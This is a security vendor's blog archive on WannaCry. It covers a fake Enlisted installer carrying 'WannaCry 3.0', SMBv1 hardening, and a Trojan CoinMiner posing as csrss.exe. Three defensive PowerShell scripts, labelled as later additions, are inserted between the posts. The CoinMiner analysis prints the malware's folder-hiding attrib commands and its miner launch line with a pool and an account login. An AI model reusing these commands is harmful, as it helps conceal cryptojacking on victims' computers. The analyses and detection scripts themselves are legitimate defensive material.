WannaCry Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/wannacry/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Last updated: Fri, 06 Oct 2023 05:32:35 +0000

WannaCry 3.0 Ransomware Aims At Enlisted Russian-speaking Players
https://gridinsoft.com/blogs/russian-speaking-enlisted-players/
Fri, 16 Jun 2023 10:48:50 +0000

A previously unknown ransomware payload that calls itself WannaCry 3.0 targets Russian-speaking players of the Enlisted game. Hackers reportedly use a modified game installer and a spoofed official site to confuse unsuspecting users.

You might also be interested in these articles: One Year of Russian-Ukrainian War in Cybersecurity, and Stabbed in the back: Chinese Mustang Panda Cyberspies Attack Russian Officials.

Information security specialists have also noted that, due to the sanctions, Russian hackers are looking for new ways to launder money.

How hackers mimic the Enlisted game

Trojanized versions of the game are distributed through fake sites, where the game installer comes bundled with ransomware that pretends to be the third version of the notorious WannaCry malware (it even changes the extension of affected files to .wncry).

[Image: Fake site that mimics the official page of the game]

Enlisted was released by Gaijin Entertainment in 2021 and has between 500,000 and a million active players every month. Since the game is free-to-play, the attackers were able to easily download the installer from the publisher’s website and modify it to distribute the malware to players.

WannaCry 3.0 Payload analysis

According to Cyble analysts who analyzed the threat, this supposedly new variant of WannaCry is actually based on Crypter, an open-source Python locker created for educational purposes. The game installer downloaded from the fake site is named “enlisted_beta-v1.0.3.115.exe”, and when run it drops two executable files on the user’s disk: ENLIST~1 (the actual game) and enlisted (the malware’s Python launcher).

[Image: Game setup window]

Upon initialization, the ransomware creates a mutex to avoid running multiple instances on the infected machine. It then parses its JSON config file to determine which file types to target, which directories to skip, which ransom note to generate, and which wallet address to list for the ransom payment.

[Image: JSON configuration file used by the malware]

Next, the ransomware looks in its working directory for a key.txt file to use in the encryption step (creating it if it does not exist). The AES-256 algorithm is used for encryption, and, as mentioned above, all locked files receive the .wncry extension.

[Image: Ransom note of WannaCry 3.0, styled to resemble the original WannaCry’s notes]

Interestingly, the malware does not attempt to terminate processes or services, which is standard practice in modern lockers, but it does take the usual ransomware step of removing shadow copies to prevent data recovery.

After the encryption pass completes, the ransomware displays a ransom note to the victim through a dedicated GUI application and gives the victim three days to make a decision. In case the victim’s antivirus blocks the ransom note window, the ransomware also changes the desktop wallpaper.


What then?

The researchers note that the hackers do not use a Tor website; instead they suggest that victims contact them through a Telegram bot. According to experts, many popular online shooters are now unavailable to Russian users, so Enlisted has become an alternative for them. Since the attackers have already taken notice of this, they can probably create other fake sites for similar games with Russian localization.

Well, what can I say? Being Russian-speaking now is not only unfashionable, but also dangerous. However, cybercriminals must be detected and punished, despite extenuating circumstances.

Microsoft recommends Exchange administrators to disable SMBv1
https://gridinsoft.com/blogs/microsoft-recommends-exchange-administrators-to-disable-smbv1/
Thu, 13 Feb 2020 16:45:01 +0000

Microsoft strongly recommends administrators disable the SMBv1 protocol on Exchange servers to protect against threats that exploit its vulnerabilities.

Let me remind you that Microsoft has been phasing out the outdated SMBv1 for a long time. Since 2016 the company has advised administrators to drop SMBv1 support, since this version of the protocol is almost 30 years old and lacks the security improvements that were added in later versions.

Those enhancements include encryption, pre-authentication integrity checks that prevent man-in-the-middle (MitM) attacks, blocking of insecure guest authentication, and more.

“To make sure that your Exchange organization is better protected against the latest threats (for example Emotet, TrickBot or WannaCry to name a few) we recommend disabling SMBv1 if it’s enabled on your Exchange (2013/2016/2019) server. There is no need to run the nearly 30-year-old SMBv1 protocol when Exchange 2013/2016/2019 is installed on your system. SMBv1 isn’t safe and you lose key protections offered by later SMB protocol versions,” writes Microsoft.

Now the Exchange Team has once again reminded administrators that running SMBv1 is unsafe, because various malware still actively abuses it. SMB vulnerabilities are exploited by EternalBlue and EternalRomance, as well as by TrickBot, Emotet, WannaCry, Retefe, NotPetya, Olympic Destroyer, and others. In addition, known SMB weaknesses can be used to spread an infection to other machines, perform destructive operations, and steal credentials.

In this regard, Microsoft experts strongly recommend disabling the obsolete version of SMB on Exchange 2013/2016/2019 servers.

“Before disabling SMBv1, you should make sure you use a correctly configured and supported DAG witness server which supports at least SMBv2. You should make sure that the witness server is running a supported version of Windows Server, which is Windows Server 2012/2012R2/2016 or 2019,” Microsoft recommends.

The company says it has not tested whether Exchange 2010 works correctly with SMBv1 disabled, and advises upgrading from Exchange 2010 to Office 365 or a newer version of Exchange Server.
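The following script is an added example, not code from the Gridinsoft post or from Microsoft’s article. It audits the SMBv1 state on an Exchange 2013/2016/2019 server in the order the post lays out (check the protocol, check the installed feature, verify the DAG witness server’s Windows version) and only disables SMBv1 when run with -Disable. It assumes Windows Server 2012 R2 or later, an elevated session, WinRM access to the witness server, and the Exchange Management Shell for the Get-DatabaseAvailabilityGroup cmdlet; without that cmdlet the witness check is skipped.

```powershell
# Added example (not from the Gridinsoft post or Microsoft's article): audit and,
# on request, disable SMBv1 on an Exchange 2013/2016/2019 server.
# Assumptions: Windows Server 2012 R2+, elevated PowerShell, WinRM reachability of
# the DAG witness server, Exchange Management Shell loaded for the DAG check.
[CmdletBinding()]
param([switch]$Disable)

# 1. Server side: is the SMB1 protocol still enabled on this host?
$server = Get-SmbServerConfiguration
Write-Output ("SMB1 server protocol enabled : {0}" -f $server.EnableSMB1Protocol)

# 2. Windows feature: is the SMB1 component itself still installed?
$feature = Get-WindowsFeature -Name FS-SMB1
Write-Output ("FS-SMB1 feature installed    : {0}" -f $feature.Installed)

# 3. DAG witness check from the post: the witness must run a supported Windows
#    Server version (2012/2012 R2/2016/2019), i.e. one that speaks SMBv2 or later.
if (Get-Command Get-DatabaseAvailabilityGroup -ErrorAction SilentlyContinue) {
    foreach ($dag in Get-DatabaseAvailabilityGroup) {
        $witness = "$($dag.WitnessServer)"
        if ($witness) {
            $os = Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $witness
            Write-Output ("DAG {0}: witness {1} runs {2} (build {3})" -f `
                $dag.Name, $witness, $os.Caption, $os.BuildNumber)
        }
    }
} else {
    Write-Output "Exchange cmdlets not loaded; skipping DAG witness check."
}

if ($Disable) {
    # Turning the protocol off takes effect immediately; removing the feature
    # additionally needs a reboot before it is fully gone.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    if ($feature.Installed) { Uninstall-WindowsFeature -Name FS-SMB1 }
    Write-Output "SMBv1 disabled. Reboot to complete feature removal."
}
```

Run it once without -Disable to read the current state and the witness server’s OS, confirm the witness is on a supported release, and only then run it again with -Disable.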

This week, as part of Patch Tuesday, Microsoft fixed 99 bugs in its products, including the widely reported 0-day in Internet Explorer, but at the same time the discontinuation of support for old products is causing a very mixed reaction from users.

What is Trojan CoinMiner csrss.exe?
https://gridinsoft.com/blogs/trojan-coinminer-csrss-exe/
Wed, 21 Jun 2017 10:10:36 +0000

Csrss.exe (also known as Client Server Runtime Process) is a legitimate and vital process of the Microsoft Windows OS. The genuine csrss.exe file is located in “C:\Windows\System32\”, and it is normal to see it running in Task Manager since it is an essential part of the operating system. But…

Owners of infected computers may notice that some process uses a great deal of CPU, which often slows the computer down or even freezes it completely. The core problem with a miner program is that it uses your PC to make money for someone else.

[Image: Small overheat you say?]

For the average user it may look like nothing more than a slow computer, but be careful: if you ignore the problem, overheating can damage parts of your PC. So if you notice CPU temperatures over 50 degrees, be prepared for the possibility that someone is already using your PC for mining.

[Image: srvanyx.exe]

Such malware is often downloaded from the Internet by users themselves. When users open unknown attachments from spam messages, they infect the computer with various kinds of malware or adware. But the developers usually have a plan B: they bundle similar malware with the installers of various free programs, so if you click through the installation without looking at the advanced settings, expect your computer to be infected with something like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

[Image: Trojan.CoinMiner sample in PEiD v0.95]

GridinSoft Anti-Malware detects it as “Trojan.Win32.CoinMiner.dd” (as in the image below):

[Image: Trojan.Win32.CoinMiner.dd detection]

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

  • DrWeb: Trojan.Hosts.6838
  • Emsisoft: Trojan.Agent.CEQQ (B)
  • ESET-NOD32: a variant of Win64/BitCoinMiner.AP potentially unsafe
  • Kaspersky: not-a-virus:RiskTool.Win64.BitCoinMiner.cev

The trojan miner creates the following folder:

C:\Windows\MicrosoftU

and creates these files in it:

  • Auto.bat
  • Start.vbs
  • Start2.vbs
  • Hide.bat
  • Start.bat
  • Start2.bat
  • 1.bat
  • 2.bat
  • Srvany.exe
  • Csrss.exe
  • Srvanyx.exe

After Trojan.CoinMiner has unpacked itself, it hides its presence using the commands in Hide.bat, which set the hidden and system attributes on the folder and its files:

attrib C:\Windows\MicrosoftU +s +h /s /d
attrib C:\Windows\MicrosoftU\*.* +s +h /s /d

The trojan miner uses the name of the system file “csrss.exe” to hide its presence in the system.

The miner starts with the following parameters:

  • stratum+tcp://xmr.pool.minergate.com:45560 – the mining pool to which the results are submitted
  • tatyana.kostomarova@gmail.com – the user login to which the mined coins are credited
  • cryptonight – the mining algorithm

Another parameter is how many threads the program will run in. This “miner” has a formula for calculating the number of processor cores to use. It is in the .bat file that launches the “miner” for the first time:

set /a cpu=%NUMBER_OF_PROCESSORS%/2+1
srvanyx -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u tatyana.kostomarova@gmail.com -p x -t %cpu%

[Image: Trojan.CoinMiner – Nah, it’s fine, the computer just slowed down a little]
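The script below is an added example, not code from the Gridinsoft post. It checks a live Windows host for the three traces the post describes: a process named csrss.exe whose image is not the genuine C:\Windows\System32\csrss.exe, any process whose command line carries the miner options shown above (the stratum+tcp:// pool scheme or -a cryptonight), and the hidden+system folder C:\Windows\MicrosoftU. The regular expression and the report format are this example’s own choices; run it from an elevated PowerShell session so that process paths and command lines are readable.

```powershell
# Added example (not from the Gridinsoft post): hunt for the CoinMiner traces the
# post describes. Requires an elevated session to read other processes' details.
function Find-CoinMinerIndicators {
    $findings = @()

    # (1) csrss.exe impostors: the genuine binary always lives in System32.
    $genuine = Join-Path $env:SystemRoot 'System32\csrss.exe'
    Get-CimInstance -ClassName Win32_Process -Filter "Name = 'csrss.exe'" |
        ForEach-Object {
            # ExecutablePath is $null for protected system processes we cannot read;
            # string comparison in PowerShell is case-insensitive by default.
            if ($_.ExecutablePath -and ($_.ExecutablePath -ne $genuine)) {
                $findings += "csrss.exe impostor, PID $($_.ProcessId): $($_.ExecutablePath)"
            }
        }

    # (2) miner-style command lines: the pool URL scheme or the algorithm switch
    #     seen in the .bat file above. Pattern is an assumption of this example.
    $minerPattern = 'stratum\+tcp://|-a\s+cryptonight'
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.CommandLine -match $minerPattern } |
        ForEach-Object {
            $findings += "miner-like command line, PID $($_.ProcessId): $($_.CommandLine)"
        }

    # (3) the dropper folder; -Force is needed because Hide.bat set +s +h on it.
    $dropDir = Join-Path $env:SystemRoot 'MicrosoftU'
    if (Test-Path -LiteralPath $dropDir) {
        $names = Get-ChildItem -LiteralPath $dropDir -Force |
            Select-Object -ExpandProperty Name
        $findings += "hidden dropper folder $dropDir contains: $($names -join ', ')"
    }

    return $findings
}

$result = Find-CoinMinerIndicators
if ($result.Count -eq 0) {
    Write-Output 'No CoinMiner indicators found.'
} else {
    $result | ForEach-Object { Write-Output "[!] $_" }
}
```

A hit on check (1) or (3) is a strong signal on its own; a hit on check (2) alone deserves a look at the process’s parent and its binary’s location before acting, since the pattern matches any miner launched with these switches, not only this sample.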

Another notable miner example is Adylkuzz. This miner exploited an SMB vulnerability for several weeks, the same vulnerability used by the widespread WannaCry (Wana Decrypt0r), which infected millions of computers last week. The main difference between the two is that the Adylkuzz miner hides as deeply as possible and quietly uses the computer’s resources to mine Bitcoin, whereas WCry (Wana Decryptor) aggressively encrypts data on the user’s computer.

[Image: msiexec.exe]

Moreover, researchers are confident that the Adylkuzz miner began infecting computers much earlier than WannaCry, as early as May 2, 2017. Adylkuzz did not attract as much attention as Wana Decrypt0r (the WannaCry ransomware) for the simple reason that an infection is much harder to notice in this case. The only “symptom” the victim sees is a slowdown of the PC as the miner consumes system resources. In addition, specialists say that Adylkuzz effectively protected its victims from WannaCry: after the miner infects a computer, it closes the “hole” in SMB and does not let other malware use the gap.

Trojan Coin Miner REMOVAL

Specialists from both companies remind everyone who has not yet installed the MS17-010 update, which closes the gap in SMB, to do so immediately and to close port 445.

It is worth noting that a program used only for “mining” does not pose a direct threat in itself, but it can be used for undesirable actions. Therefore, we highly recommend downloading a professional anti-malware tool, scanning your PC with it and cleaning up your PC.

How to protect your PC from a virus, that has infected systems all around the world? Be careful, WannaCry may come for you!
https://gridinsoft.com/blogs/protect-pc-virus-infected-systems-around-world-careful-wannacry-may-come/
Sat, 13 May 2017 10:25:08 +0000

I think you’ve already heard about this virus. In the past few days it has spread to computers in 74 countries! The biggest impact is in China, Russia, Peru, France, and Canada. In a single day it infected German rail stations, Chinese universities, the Russian Interior Ministry, British hospitals, and other government institutions. Impressive, isn’t it?

[Image: German train station]

How is WannaCry (or Wanna Decrypt0r 2.0) spreading, and what is it capable of?

A PC can get infected by downloading pirated programs, clicking on suspicious pop-ups with fake “update” links, and via emails. Be careful before opening attachments or running programs from an unknown source.

[Image: WannaCry in the university]

When it infects your PC, it scans all files and encrypts them, appending the .WNCRY extension. Access to images, documents, music, and system files is blocked. After that you will see the message “Oops, your files have been encrypted” on the screen, together with a demand to pay $300 in Bitcoin to decrypt your files. However, no one guarantees that the files will be decrypted after the ransom is paid.
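The script below is an added example that is not part of either Gridinsoft post; it serves both this article and the WannaCry 3.0 article above, since both lockers append a .wncry/.WNCRY extension and the newer one also deletes Volume Shadow Copies. It counts renamed files per folder under the paths you give it and reports how many shadow copies still exist, which is a quick first triage step before the removal procedure. The default scan paths and the report layout are assumptions of this example; run it as an administrator so that Win32_ShadowCopy is readable.

```powershell
# Added example (not from the Gridinsoft posts): triage a host for files renamed
# with the .wncry/.WNCRY extension used by WannaCry and "WannaCry 3.0", and report
# whether Volume Shadow Copies still exist. Default paths are an assumption.
param(
    [string[]]$Paths = @("$env:USERPROFILE\Documents", "$env:USERPROFILE\Desktop")
)

function Get-WncryReport {
    param([string[]]$ScanPaths)

    $byFolder = @{}
    foreach ($root in $ScanPaths) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # -Force includes hidden files; -ieq makes the extension match case-insensitive.
        Get-ChildItem -LiteralPath $root -Recurse -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -ieq '.wncry' } |
            ForEach-Object {
                $dir = $_.DirectoryName
                if (-not $byFolder.ContainsKey($dir)) { $byFolder[$dir] = 0 }
                $byFolder[$dir]++
            }
    }

    $total = 0
    foreach ($n in $byFolder.Values) { $total += $n }

    # Zero shadow copies on a machine that normally has them is itself a warning
    # sign: the 3.0 locker deletes them to block recovery.
    $shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        EncryptedFiles  = $total
        AffectedFolders = $byFolder
        ShadowCopyCount = $shadows.Count
    }
}

$report = Get-WncryReport -ScanPaths $Paths
Write-Output ("Files with .wncry extension : {0}" -f $report.EncryptedFiles)
Write-Output ("Shadow copies present       : {0}" -f $report.ShadowCopyCount)
foreach ($entry in $report.AffectedFolders.GetEnumerator() | Sort-Object Value -Descending) {
    Write-Output ("  {0,6}  {1}" -f $entry.Value, $entry.Key)
}
```

A non-zero EncryptedFiles count with ShadowCopyCount at zero means the recovery route the post mentions (decryption tools) is the only one left; a non-zero shadow copy count is worth preserving before any cleanup that might trigger their deletion.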

[Image: WannaCry ransom demand]

To make sure this epidemic passes you by, you need to install Microsoft’s MS17-010 patch immediately. After installation, restart the computer. Then scan your PC, and if a malicious component (Trojan.Win64.EquationDrug.gen) is detected, reboot the system again and verify that the MS17-010 patch is installed.

If you are already infected, follow the steps below to eliminate the virus.

  1. Boot into safe mode with networking.
  2. Scan the system with a strong antivirus program and remove all detected files.

The final step is to restore the encrypted files, and you can only do this after WannaCry has been removed; otherwise system files and the registry can be damaged. For this you can try various decryption programs, but they do not guarantee that the files will be restored.

So, as we can see, viruses don’t sleep and are evolving every day. WannaCry will be on our next list of the top 10 viruses.
